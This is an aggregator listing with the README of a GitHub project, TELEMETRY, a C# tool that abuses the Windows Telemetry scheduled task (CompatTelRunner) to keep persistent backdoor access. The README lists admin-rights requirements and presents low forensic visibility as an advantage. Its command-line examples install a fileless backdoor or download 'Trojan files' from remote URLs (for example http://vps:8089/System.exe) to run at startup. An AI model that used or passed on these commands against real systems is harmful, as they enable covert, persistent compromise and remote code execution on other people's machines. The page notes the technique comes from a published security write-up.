Ecosyste.ms: Awesome
https://github.com/360-Linton-Lab/Telemetry
WINDOWS TELEMETRY权限维持
- Host: GitHub
- URL: https://github.com/360-Linton-Lab/Telemetry
- Owner: 360-Linton-Lab
- Created: 2020-07-02T08:50:29.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2020-07-02T09:03:45.000Z (over 4 years ago)
- Last Synced: 2024-08-05T17:24:20.041Z (4 months ago)
- Language: C#
- Homepage:
- Size: 1.2 MB
- Stars: 259
- Watchers: 7
- Forks: 48
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - 360-Linton-Lab/Telemetry - WINDOWS TELEMETRY权限维持 (C#)
README
# TELEMETRY
### Background
[TELEMETRY](#TELEMETRY-1) is a C# persistence tool for Windows.
Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.
- **Local admin rights to install (requires the ability to write to HKLM)**
- **CompatTelRunner.exe must be present on the host**
- **Windows Server 2008 R2/Windows 7 through Windows Server 2019/Windows 10**
### Advantage
- **Uses the system's own Telemetry scheduled tasks**
- **The only artefact that looks suspicious during troubleshooting is the registry entry**
### Command Line Usage
```
ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
.Imanfeng
Features:
Install: - Deployment authority maintains backdoor
Command:
TELEMETRY.exe install /command:calc
- Execute command without file backdoor
TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe
- Remotely download Trojan files to the specified directory for backdoor startup
TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe
- Remotely download Trojan files to C:\Windows\Temp\compattelrun.exe for backdoor startup
TELEMETRY.exe install /path:C:\Windows\Temp\check.exe
- Set path Trojan files for backdoor startup
Parameter:
/command: - Execute Command
/url: - Download FROM
/path: - Download To
```
- Execute command without file backdoor
```
Telemetry.exe install /command:calc
```
![1](PIC/2.png)
- Remotely download Trojan files for backdoor startup
```
Telemetry.exe install /url:http://vps:8089/System.exe
```
![2](PIC/1.png)
### Learn
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/